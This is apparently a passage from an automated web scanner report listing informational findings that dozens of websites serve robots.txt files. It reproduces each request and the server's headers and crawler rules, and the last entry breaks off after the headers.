Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=604800
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /*printable=Y
Disallow: /*js=*
Disallow: /*sort=*
Disallow: /*sort_direction=*
Disallow: /product.php*
Disallow: /home.php?cat=*
Disallow: /catalog/
Disallow: /search.php
Disal
...[SNIP]...

27.1268. http://www.pfchangshomemenu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pfchangshomemenu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pfchangshomemenu.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 01 Apr 2011 22:00:55 GMT
ETag: "12a01fc-66-49fe28b47b3c0"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 01:26:38 GMT
Connection: close

User-agent: *
Disallow: /tell-a-friend.php
Disallow: /tell-a-friend2.php
Disallow: /tell-a-friend3.php

27.1269. http://www.pgbrandsampler.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgbrandsampler.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pgbrandsampler.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:14:08 GMT
Server: Apache
Last-Modified: Fri, 14 Nov 2008 16:11:33 GMT
ETag: "396d025-9a-491da335"
Accept-Ranges: bytes
Content-Length: 154
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgi_root/
Disallow: /content/
Disallow: /en_US/products/walgreens/
Disallow: /coupons-yearofsavings/banners/

27.1270. http://www.pharmacyrxworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pharmacyrxworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pharmacyrxworld.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:04:18 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 18 Jan 2011 15:17:15 GMT
ETag: "8aa065-15cf-49a20653d74c0"
Accept-Ranges: bytes
Content-Length: 5583
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: FreeFind
Disallow: /

User-agent: BecomeBot
Disallow: /

User-agent: Nutch
Disallow: /

User-agent: Jetbot/1.0
Disallow: /

User-ag
...[SNIP]...

27.1271. http://www.pharmahelper.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pharmahelper.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pharmahelper.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:00:36 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 209
Last-Modified: Wed, 05 May 2010 05:15:51 GMT
Connection: close

Sitemap: http://www.pharmahelper.com/sitemap

User-agent: *
Disallow: /Launch
Disallow: /click
Disallow: /search
Disallow: /ProductSearch
Disallow: /ask-a-doctor
Disallow: /ask-a-doctor-how
Disallow:
...[SNIP]...

27.1272. http://www.phcc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phcc.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.phcc.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:21 GMT
Server: Apache/2.2.17
Last-Modified: Mon, 26 Apr 2010 19:39:53 GMT
ETag: "10f-48528f0dc5440"
Accept-Ranges: bytes
Content-Length: 271
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /c/
Disallow: /e/
Disallow: /f/
Disallow: /i/
Disallow: /t/
Disallow: /inc/
Disallow: /s/
Disallow: /cal/
Disallow: /caladmin/
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /w
...[SNIP]...

27.1273. http://www.phonesale.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phonesale.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.phonesale.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 01 Apr 2011 15:12:09 GMT
Accept-Ranges: bytes
ETag: "85eea42b7ff0cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:41:39 GMT
Connection: close
Content-Length: 393

# /robots.txt file for http://www.phonesale.com/
# mail webmaster@phonesale.com with questions or comments

# subdirectory lockouts for regular "www" folder
User-agent: *
Disallow: /admin/
Disal
...[SNIP]...

27.1274. http://www.photographybay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.photographybay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.photographybay.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Sat, 27 Jan 2007 17:57:57 GMT
ETag: "cee-97-42809625e3340"
Accept-Ranges: bytes
Content-Length: 151
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: */feed*
Disallow: */trackback
Disallow: */wp-admin
Disallow: */wp-content
Disallow: */wp-includes
Disallow: *wp-login.php

27.1275. http://www.photostockplus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.photostockplus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.photostockplus.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:29:38 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 05 Apr 2011 22:03:51 GMT
ETag: "ac21fd-31-4a0330d22bfc0"
Accept-Ranges: bytes
Content-Length: 49
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Crawl-delay: 5.0

27.1276. http://www.photozone.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.photozone.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.photozone.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:12 GMT
Server: Apache
Last-Modified: Mon, 04 May 2009 11:06:02 GMT
ETag: "1b110b9-160-25d7ba80"
Accept-Ranges: bytes
Content-Length: 352
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1277. http://www.phrontistery.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phrontistery.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.phrontistery.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:42:31 GMT
Server: Apache
Last-Modified: Fri, 22 Dec 2006 03:38:25 GMT
ETag: "18774519-50-458b5331"
Accept-Ranges: bytes
Content-Length: 80
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /public_html/private/

Disallow: /public_html/temp/

27.1278. http://www.picturecorrect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.picturecorrect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.picturecorrect.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:38:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://www.picturecorrect.com/xmlrpc.php
X-UA-Compatible: IE=edge
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1279. http://www.pierfishing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pierfishing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pierfishing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:10:21 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 19 May 2010 01:37:51 GMT
ETag: "28037-c9-818ed9c0"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt

User-agent: *
Disallow: /admin/ # this site is underdevelopment

User-agent: Fasterfox
Disallow: /

User-agent: ConveraCrawler
Disallow: /

User-agent: *
Crawl-delay: 5
...[SNIP]...

27.1280. http://www.pilgrimtours.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pilgrimtours.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pilgrimtours.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:03:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 31 Dec 2010 07:43:22 GMT
ETag: "4a389b3-b76-f4e21a80"
Accept-Ranges: bytes
Content-Length: 2934
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

/china/2005/
/tours/?agID=33441
/>
/`
/PassionPlay/oberammergau_seating.htm
/alumni/school/nwosurome.htm
/alumni/school/uwwegypt.htm
/asia/air/air.htm
/british.html
/christia
...[SNIP]...

27.1281. http://www.pinknews.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pinknews.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pinknews.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:00:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Pingback: http://www.pinknews.co.uk/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: PHPSESSID=32ht4mk7o5rrh95en78va44634; path=/
Vary: Host
Connection: close
Content-Type: text/plain; charset=utf-8


# XML Sitemap Feed 3.9.1 (http://4visions.nl/en/wordpress-plugins/xml-sitemap-feed/)
Sitemap: http://www.pinknews.co.uk/sitemap.xml
Sitemap: http://www.pinknews.co.uk/sitemap-news.xml

User-agent: *

...[SNIP]...

27.1282. http://www.pinupgirlclothing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pinupgirlclothing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pinupgirlclothing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 07 Apr 2011 13:38:49 GMT
Accept-Ranges: bytes
Content-Length: 293
Cache-Control: max-age=31536000
Expires: Thu, 03 May 2012 01:18:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /*?
Disallow: /app/
Disallow: /catalog/
Disallow: /catalogsearch/
Disallow: /checkout/
Disallow: /customer/
Disallow: /downloader/
Disallow: /js/
Disallow: /lib/
Disallow: /pkg
...[SNIP]...

27.1283. http://www.pisshq.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pisshq.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pisshq.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
X-UA-Compatible: IE=EmulateIE7
X-Pingback: http://www.pisshq.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1284. http://www.pitbull-chat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pitbull-chat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pitbull-chat.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 16 Dec 2008 16:19:45 GMT
ETag: "24e03f4-844-53d6ca40"
Accept-Ranges: bytes
Content-Length: 2116
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /archive/index.php/t-*.html
Disallow: /?page=*
Disallow: /admincp/
Disallow: /clientscript/
Disallow: /includes/
Disallow: /install/
Disallow: /modcp/
Disallow: /modules/
Disal
...[SNIP]...

27.1285. http://www.pixazza.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pixazza.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pixazza.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 00:58:04 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Content-Type: text/plain
Cache-Control: s-maxage=86400, max-age=86400
Vary: Accept-Encoding
Age: 3592
Content-Length: 304
X-Cache: HIT from lb3-sv.int.pixazza.com
X-Cache-Lookup: HIT from lb3-sv.int.pixazza.com:80
Via: 1.0 lb3-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: close


User-agent: *
Disallow: /activate/
Disallow: /ad-click/
Disallow: /ad-impression/
Disallow: /addwishlist/
Disallow: /ajax/
Disallow: /click/
Disallow: /deactivate/
Disallow: /hide/
Disallow: /show/

...[SNIP]...

27.1286. http://www.pixdrop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pixdrop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pixdrop.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:17:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 07 Sep 2008 04:14:04 GMT
ETag: "9fb9f42-35-88765b00"
Accept-Ranges: bytes
Content-Length: 53
Connection: close
Content-Type: text/plain

#robots.txt

User-agent: *
Disallow: /forum/account/

27.1287. http://www.pjtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pjtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pjtv.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 29 Aug 2008 20:03:56 GMT
Accept-Ranges: bytes
ETag: "05e75e12ac91:0"
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 03:12:15 GMT
Connection: close
Content-Length: 25

User-agent: *
Disallow:

27.1288. http://www.plantdelights.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.plantdelights.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.plantdelights.com

Response

HTTP/1.1 200 OK
Content-Length: 2378
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 17:05:13 GMT
Accept-Ranges: bytes
ETag: "2b95b4d6aedcb1:25491"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:14:46 GMT
Connection: close

User-agent: *

Disallow: /dev/
Disallow: /aspnet_client/
Disallow: /aboutus.asp.bak
Disallow: /basket.js
Disallow: /calender_old.js
Disallow: /calender.js
Disallow: /calender1.js
Disallow: /c
...[SNIP]...

27.1289. http://www.plasticsurgery4u.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.plasticsurgery4u.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.plasticsurgery4u.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:08:42 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sat, 01 Jan 2011 23:26:55 GMT
ETag: "c7e7bd-47f-411f4dc0"
Accept-Ranges: bytes
Content-Length: 1151
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /elements/
Disallow: /bermant_images/
Disallow: /new_buttons_folder/
    Disallow: /new_buttons/
Disallow: /ba_ca_lid/
Di
...[SNIP]...

27.1290. http://www.platformq.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.platformq.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.platformq.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:09:35 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Fri, 24 Aug 2007 02:56:13 GMT
ETag: "8ae848-19-43869265a0d40"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1291. http://www.playmymovs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playmymovs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playmymovs.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:30:36 GMT
Content-Type: text/plain
Content-Length: 36
Last-Modified: Tue, 11 Jan 2011 08:50:55 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Baiduspider
Disallow: /

27.1292. http://www.pledge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pledge.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pledge.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 08 Dec 2010 20:00:50 GMT
Accept-Ranges: bytes
ETag: "045709c1297cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:51:27 GMT
Connection: close
Content-Length: 70

Sitemap: http://www.pledge.com/sitemap.xml

User-agent: *
Disallow:

27.1293. http://www.pngaming.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pngaming.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pngaming.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:23 GMT
Server: Apache
Last-Modified: Tue, 19 Apr 2011 11:23:28 GMT
ETag: "2db804e-bd-bcb98c00"
Accept-Ranges: bytes
Content-Length: 189
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

User-agent: Googlebot-Image
Disallow: /

User-agent: *
Disallow: /main/images/
Disallow: /main/downloads/
Disallow: /downloads/
Disallow: /HC_KS_Video/

27.1294. http://www.pocketables.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pocketables.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pocketables.net

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web049
X-Webserver: oak-tp-web049
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Wed, 04 May 2011 03:34:29 GMT
X-Varnish: 3680053535 2662397581
Age: 1054518
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Allow: /.m/
Disallow: /

User-agent: Y!J-SRD
Allow: /.m/
Dis
...[SNIP]...

27.1295. http://www.pofig.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pofig.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pofig.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 02:25:03 GMT
Content-Type: text/plain
Content-Length: 4892
Last-Modified: Mon, 04 Apr 2011 06:04:19 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Yandex
Disallow: /forum/post
Disallow: /forum/admincp/
Disallow: /forum/backup/
Disallow: /forum/announcement.php
Disallow: /forum/announcement
Disallow: /forum/calendar.php
Disallow: /for
...[SNIP]...

27.1296. http://www.pokebeach.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pokebeach.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pokebeach.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://pokebeach.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1297. http://www.pokerlistings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pokerlistings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pokerlistings.com

Response

HTTP/1.1 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Cache-Control: no-cache, max-age=0, must-revalidate
Age: 2592
Content-Length: 1823
Date: Wed, 04 May 2011 03:29:12 GMT
Connection: close
X-Cache: HIT
X-Varnish: 1002586140 1002572975
Server: Apache/2.2.13 (EL)
X-Powered-By: PHP/5.2.11
Content-Type: text/plain; charset="utf-8"
Pragma: no-cache
Via: 1.1 varnish

User-agent: *
Disallow: /content/
Disallow: /download/
Disallow: /play/
Disallow: /campagnes/
Disallaow: /pokerlistings-tools/
Disallow: /poker-glossary*
Disallow: *print=true
Disallow: *review=summar
...[SNIP]...

27.1298. http://www.police-scanner.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.police-scanner.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.police-scanner.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:25:35 GMT
Server: Apache
Last-Modified: Fri, 25 Mar 2011 03:47:31 GMT
ETag: "1ddcdca-23b-4d8c1053"
Accept-Ranges: bytes
Content-Length: 571
Keep-Alive: timeout=4, max=100
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /affiliate/
Disallow: /board/
Disallow: /cgi/
Disallow: /computing/
Disallow: /content/
Disallow: /data/
Disallow: /events/
Disallow: /guest/
Disallow: /images/
Disal
...[SNIP]...

27.1299. http://www.pondboss.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pondboss.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pondboss.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 10 Nov 2010 03:00:17 GMT
Accept-Ranges: bytes
ETag: "80f628678380cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:48:57 GMT
Connection: close
Content-Length: 328

# /robots.txt file
# mail dns@dsbworldwide.com for constructive criticism

User-agent: webcrawler
Disallow: /

User-agent: lycra
Disallow: /

User-agent: *
Disallow: /bin
Disallow: /common
...[SNIP]...

27.1300. http://www.popfi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popfi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popfi.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:11 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.popfi.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.popfi.com/sitemap.xml.gz

27.1301. http://www.popjustice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popjustice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popjustice.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:48:55 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 07 Jun 2009 22:08:08 GMT
ETag: "8b87ac-11e-5c4d2200"
Accept-Ranges: bytes
Content-Length: 286
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

27.1302. http://www.populartag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.populartag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.populartag.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:19:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.6
Vary: Cookie
X-Pingback: http://www.populartag.com/xmlrpc.php
Set-Cookie: wwsgd_visits=1; expires=Thu, 03-May-2012 00:19:24 GMT; path=/

User-agent: *
Disallow:

Sitemap: http://www.populartag.com/sitemap.xml

27.1303. http://www.poweredtemplates.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.poweredtemplates.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.poweredtemplates.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:40:49 GMT
Content-Type: text/plain
Content-Length: 43
Last-Modified: Mon, 15 Jun 2009 13:48:50 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Mediapartners-Google
Disallow:

27.1304. http://www.powertrainproducts.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.powertrainproducts.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.powertrainproducts.net

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:21:30 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
ETag: "0ac3393c4cb1:2"
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...

27.1305. http://www.pp.ua/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pp.ua
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pp.ua

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 02:25:05 GMT
Content-Type: text/plain
Connection: close
Content-Length: 44

User-Agent: *
Disallow: /rus/adm/
Allow: /

27.1306. http://www.practiceone.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.practiceone.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.practiceone.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:29 GMT
Server: Apache
Last-Modified: Thu, 10 Jul 2008 22:55:30 GMT
ETag: "a94141c-1a-451b352621c80"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.1307. http://www.preachtheword.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.preachtheword.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.preachtheword.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:00 GMT
Server: Apache/2
Last-Modified: Sat, 05 Feb 2011 16:30:46 GMT
ETag: "120-49b8b854cb980"
Accept-Ranges: bytes
Content-Length: 288
Connection: close
Content-Type: text/plain

Sitemap: http://www.preachtheword.com/sitemap.xml

User-agent: *
Allow: /braille/index.php
Disallow: /request-cds.html
Disallow: /gospel-order.html
Disallow: /comments.php
Disallow: /playlist.xspf
Dis
...[SNIP]...

27.1308. http://www.presidentsusa.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.presidentsusa.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.presidentsusa.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:40 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Thu, 02 Apr 2009 16:58:44 GMT
